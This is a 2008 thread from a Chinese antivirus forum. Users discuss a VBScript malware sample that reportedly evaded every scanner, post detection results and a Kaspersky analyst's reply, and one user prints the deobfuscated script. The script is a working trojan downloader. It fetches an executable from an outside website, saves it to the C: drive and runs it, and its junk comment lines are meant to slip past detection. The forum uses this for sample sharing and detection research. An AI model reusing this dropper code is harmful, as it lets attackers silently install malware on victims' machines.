查看: 3700|回复: 22
收起左侧

[病毒样本] 目前過全部的殺軟

[复制链接]
juijui
发表于 2008-4-22 20:31:08 | 显示全部楼层 |阅读模式
一個樣本,目前過全部的殺軟!!!
大家測看看!!!

結果: 0/32 (0%)


File ID FilenameSize (Byte)Result
3826737 台北掃黃紀要.zip7.54 KBOK
A listing of files contained inside archives alongside their results can be found below:
File ID FilenameSize (Byte)Result
3826738 #x#_#######n.vbe 154.18 KB MALWARE

Please find a detailed report concerning each individual sample below:
FilenameResult
#x#_#######n.vbe MALWARE

The file '#x#_#######n.vbe' has been determined to be 'MALWARE'.
Our analysts named the threat VBS/Dldr.Agent.GA. The term "VBS/" denotes a Visual Basic script-virus.Detection will be added to our virus definition file (VDF) with one of the next updates.

[ 本帖最后由 juijui 于 2008-4-22 20:34 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
HC303
发表于 2008-4-22 20:32:06 | 显示全部楼层
报过,我就不上报。
diablolong
发表于 2008-4-22 20:33:15 | 显示全部楼层
ao~

[ 本帖最后由 diablolong 于 2008-4-23 21:23 编辑 ]

评分

参与人数 1经验 -1 收起 理由
qianwenxiang -1 抱歉,请勿使用不雅词汇;

查看全部评分

hellobaby
发表于 2008-4-22 20:38:28 | 显示全部楼层
是病毒吗?运行有什么危害?(此文件后缀是VBS的,毒霸没有查出)

[ 本帖最后由 hellobaby 于 2008-4-22 20:43 编辑 ]
qigang
发表于 2008-4-22 20:40:22 | 显示全部楼层

2/0

rising20.41.12未杀!
jimmyleo
发表于 2008-4-22 21:03:41 | 显示全部楼层
  1. on error resume next
  2. Set ws = CreateObject("Wscript.Shell")
  3. ws.run "cmd /c set date=%date% &&date 2008-4-20 &&ping 127.0.0.1 -n 29 &&date %date%",vbhide
  4. ps.Name="hfgty.exe" or ps.Name="4451y.exe" or ps.name="gfhftr.exe" or ps.name="86231.exe" or ps.name="dhfgh4.exe" or ps.name="dfghgfy575.exe"
  5. iLocal = LCase("c:\fgtyt.exe"):iRemote = LCase("http://www.13806999228.com/31.exe")
  6. 'if 1=2 then Wscript.echo "iMPossible!"
  7. wscript.sleep 2
  8. 'if 1=2 then Wscript.echo "iMPossible!"
  9. Set xPost = CreateObject("Microsoft.XMLHTTP")
  10. 'if 1=2 then Wscript.echo "iMPossible!"
  11. xPost.Open "GET",iRemote,0
  12. 'if 1=2 then Wscript.echo "iMPossible!"
  13. xPost.Send()
  14. 'if 1=2 then Wscript.echo "iMPossible!"
  15. Set sGet = CreateObject("ADODB.Stream")
  16. 'if 1=2 then Wscript.echo "iMPossible!"
  17. sGet.Mode = 3
  18. 'if 1=2 then Wscript.echo "iMPossible!"
  19. sGet.Type = 1
  20. 'if 1=2 then Wscript.echo "iMPossible!"
  21. sGet.Open()
  22. 'if 1=2 then Wscript.echo "iMPossible!"
  23. sGet.Write(xPost.responseBody)
  24. 'if 1=2 then Wscript.echo "iMPossible!"
  25. sGet.SaveToFile iLocal,2
  26. 'if 1=2 then Wscript.echo "iMPossible!"
  27. Set Runner=CreateObject("Wscript.Shell")
  28. 'if 1=2 then Wscript.echo "iMPossible!"
  29. Runner.run iLocal
复制代码
wangjay1980
发表于 2008-4-22 23:02:49 | 显示全部楼层
Hello,

yexye_-#Lm#nn.vbe - Trojan-Downloader.VBS.Agent.mt

New malicious software was found in this file. It's detection will be included in the next update. Thank you for your help.

Please quote all when answering.

--
Best regards, Evgeny Aseev
Virus analyst, Kaspersky Lab.
e-mail: newvirus@kaspersky.com
http://www.kaspersky.com/

http://www.kaspersky.com/virusscanner - free online virus scanner.
http://www.kaspersky.com/helpdesk.html - technical support.

> Attachment: ??????.zip
[:1:]
施主你装比
发表于 2008-4-22 23:51:02 | 显示全部楼层
nod32  卡巴均不报
519793367
发表于 2008-4-22 23:59:12 | 显示全部楼层
试了下 avk 蜘蛛 NOD 红伞 avg 都未报
change_018
发表于 2008-4-23 00:53:27 | 显示全部楼层
卡巴飘~
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-3 14:29 , Processed in 0.155022 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表